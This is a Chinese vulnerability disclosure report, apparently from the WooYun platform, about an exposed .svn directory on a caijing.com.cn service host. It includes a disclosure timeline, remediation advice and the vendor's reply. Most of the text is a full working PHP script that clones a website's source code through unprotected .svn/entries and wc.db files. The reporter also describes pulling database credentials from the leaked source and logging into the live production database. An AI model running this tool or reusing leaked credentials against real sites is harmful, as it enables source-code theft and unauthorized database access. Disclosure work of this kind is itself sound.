2014-11-19: 细节已通知厂商并且等待厂商处理中 2014-11-20: 厂商已经确认,细节仅向厂商公开 2014-11-30: 细节向核心白帽子及相关领域专家公开 2014-12-10: 细节向普通白帽子公开 2014-12-20: 细节向实习白帽子公开 2015-01-03: 细节向公众公开
财经网某处SVN泄露到裤子脱落
漏洞地址:http://service.caijing.com.cn/.svn/entries
看财经网审核人员对svn泄露的认识不够,以为svn泄露没什么影响,其实危害很大。我总结了一下svn信息泄露有2点重大危害。1.泄露svn地址和用户信息,通过爆破可控制svn权限。2.获取上一次svn操作为止的网站源码。使用下面的脚步可以通过SVN泄露获取网站源码。
#!/usr/bin/php -q<?php/** * 本脚本用于下载.svn目录未作权限限制的网站源码,适用于现有的各种svn版本. * 请用php5.3+来运行本脚本.想支持更低版本,请自行修改源码.不必通知我. * 作者:小雨@乌云 * http://蛋疼.com * changelog: * 2.1 2012-3-28 * .svn不成功时尝试使用_svn目录 * * 2.0 2012-3-28 * 增加了蓝色小药丸可读取最新的svn 1.7+ * 目前人世间常见的svn版本都可以打劫了 * * 1.0 2012-3-22 * 初始版本,适用于svn 1.4~1.6 * 更低版本手头没有,无法检验 */#错误报告级别,只报告错误error_reporting(E_ERROR);#要显示错误ini_set('display_errors','On');define('VERSION', '2.1');ini_set('user_agent','svn_clone(svn_clone v'.VERSION.'; by 小雨@乌云 email:z@zt.vc; http://蛋疼.com)');#缓存目录,最好放在tmpfs上,我没做过缓存期的设置,所以想真正重新抓一次就必须手工删缓存目录define('CACHE_DIR', '/tmp/cache');#代码要保存到的路径,不同域名会自动分目录存放的define('DATA_DIR', '/data/src');#调试信息级别define('NONE', 0);#无条件报告define('ERROR', 1);#错误define('WARNING', 2);#警告define('ALL', 3);#全部define('EGGACHE', 4);#蛋疼#获取参数$opts = getopt('u:chv',array('url:','color','help','verbose'));#获取传入的URL地址$url = $opts['url']?:($opts['u']?:null);#是否显示帮助$help = isset($opts['h'])+isset($opts['help']);#是否使用颜色define('USECOLOR', isset($opts['c'])+isset($opts['color']));#调试信息级别,v越多越详细,最多接受3个v, 函数内用,懒得写global,定义成常量吧.define('VERBOSE', count($opts['v'])+count($opts['verbose']));#本程序的名字,额,我不知道这个写法是否兼容别的shell.反正bash下用它判断是没错的$cmd = basename($_SERVER['_'])=='php'?'php '.$_SERVER['PHP_SELF']:$_SERVER['_'];if($help or !$url) { die("Usage:\t$cmd option [url]\n". "\t-u --url\turl\t您想要通过svn克隆的网站url\n". "\t-c --color\t\t使用控制台色彩输出\n". "\t-v --verbose\t\t打印更多的详细信息,v越多越详细\n". "\t-h --help\t\t本帮助信息\n". "Examples:\n". "\t$cmd -u http://localhost\n". "\t$cmd -u http://localhost -cvv\n". "\t$cmd -vu http://localhost\n". "\t$cmd -cvvu http://localhost\n". "\t$cmd --url http://localhost --color --verbose --verbose --verbose 有人勤奋到使用这种格式咩?! Orz.\n" );}#我真是蛋疼...写这行干啥呢...debug("蛋疼是一种病,要淡定,不要蛋疼...\n", EGGACHE);#发现有的站用_svn目录来代替.svn目录,针对这种现象,程序做一点改进,尝试两种方式#但是遇到混合使用.svn和_svn的精神病目录就不好办了。#我不想把程序改的那么恶心,就先这样吧。够正常人用了。foreach(array('/.svn/','/_svn/') as $svn_dir){ #只有在.svn不成功的情况下才会尝试其它形式的svn目录 if(svn_clone($url))break;}#本程序的主函数function svn_clone($url) { global $svn_dir; #去除多余的url结尾多余的斜杠 $url=trim($url,'/'); $entries_url = $url.$svn_dir.'entries'; $content = get($entries_url); if($content===false) { return debug("$url 不是一个合法的svn工作副本!\n", ERROR); } elseif(strlen($content)<10) { #return debug("某个东西太短了,需要蓝色的小药丸!\n", ERROR); #蓝色小药丸 for svn 1.7+ debug("尝试使用蓝色的小药丸来读取svn 1.7+的工作副本数据库\n", ALL); class_exists('SQLite3') or die("蓝色小药丸需要sqlite3扩展,请安装后再试...\r\n"); $wcdb_url = $url.$svn_dir.'wc.db'; $content = get($wcdb_url); if($content===false) { debug("$wcdb_url 不是一个合法的sqlite数据库文件!\n", ERROR); return; } #怕wc.db重名,给它生成一个不容易重复的名字,稍后自动删除它. $db_file = put(uniqid($url.'/temp.db.'),$content); register_shutdown_function('unlink', $db_file); $db = new SQLite3($db_file, SQLITE3_OPEN_READWRITE); $sql = 'select local_relpath as path,checksum as hash from nodes where kind="file"'; $res = $db->query($sql); if($res===false) { $errmsg = $db->lastErrorMsg(); debug("查询语句 $sql 错误: $errmsg\n", ERROR); return; } while($row = $res->fetchArray()) { #根据数据库里存的哈希值拼出svn-base文件路径 #哈希值看起来是这样的$sha1$a096870b5e1dc28aa8cea62238dc12c199a8ac8c $hash = substr(strrchr($row['hash'],'$'),1); $sub = $hash[0].$hash[1]; $svn_base = $url.$svn_dir.'pristine/'.$sub.'/'.$hash.'.svn-base'; $content = get($svn_base); put($url.'/'.$row['path'],$content); } return; } #匹配出entries中的文件和目录名 preg_match_all('/\f\n([^\n]+?)\s(\w+)\s/s', $content, $m) or debug("$entries_url 不包含文件或子目录\n", WARNING); $files = array_combine($m[1], $m[2]); foreach($files as $file=>$type) { if($type=='dir') { debug(">>> 进入 $file 目录\n", ALL); svn_clone($url.'/'.$file); debug("<<< 退出 $file 目录\n", ALL); } elseif($type=='file') { debug("*** 下载 $file 文件\n", ALL); fetch($url.$svn_dir.'text-base/'.$file.'.svn-base'); } }}#抓取并保存function fetch($text_base){ put($text_base, get($text_base));}#带缓存的抓取function get($url) { global $svn_dir; $file = CACHE_DIR.'/'.chunk_split(substr(md5($url),0,6),2,'/').urlencode($url); $dir = dirname($file); if(!is_dir($dir)) { mkdir($dir,0777,true); } debug("读取 {$url} 内容\n", ALL); if(!file_exists($file)) { $content = file_get_contents($url) or debug("读取 {$url} 内容为空\n", WARNING); if($content) { file_put_contents($file, $content) or debug("写入 {$file} 内容为空\n", WARNING); } } else { $content = file_get_contents($file) or debug("读缓存 {$file} 内容为空\n", WARNING); } return $content;}#保存到数据目录function put($url, $content=''){ global $svn_dir; $file = DATA_DIR.substr(strchr($url,'://'),2); #改变了目录取法,适应不带.svn的路径,以前那三个dirname太傻了 $dir = strpos($file,$svn_dir)?substr($file,0,strpos($file, $svn_dir)):dirname($file); $file = basename($file,'.svn-base'); #看看你那什么有多长? $len = strlen($content); if(!is_dir($dir)) { debug("目录 {$dir} 不存在,自动创建\n", ALL); mkdir($dir,0777,true); } debug("写入 $file 到 $dir ($len bytes)\n", ALL); file_put_contents($dir.'/'.$file, $content) or debug("写入 {$file} 内容为空\n", WARNING); //返回保存之后的文件路径 return $dir.'/'.$file;}#打印调试信息function debug($msg, $level=0) { #颜色定义 0:灰, 1:红, 2:绿, 3:黄, 4:蓝, 5:粉, 6:青, 7:白 static $colors = array(NONE=>0, ERROR=>1, WARNING=>2, ALL=>3, EGGACHE=>4); VERBOSE>=$level && (USECOLOR?printf("\033[1;3{$colors[$level]}m$msg\033[m", $color, $msg):print $msg);}#EOF
通过svn获取到源码后,一方面可以做源码审计,看是否存在漏洞进一步攻击。另一方面,可以查看敏感信息加以利用。以从service.caijing.com.cn获取到的源码为例,我获取到数据库配置信息。
我尝试登陆,居然允许任意ip登陆,且用户权限和root相差无几。
为避免对生产环节产生影响,在此停下,不进一步提权。
1.删除所有svn泄露信息2.限制数据库用户登陆ip3.降低数据库用户权限
危害等级:中
漏洞Rank:7
确认时间:2014-11-20 15:54
非常感谢白帽子,测试当中提到的那个库的地址,麻烦私信给我,我们好像没有这个地址,59.188.。。。,再次感谢对我们的帮助。
暂无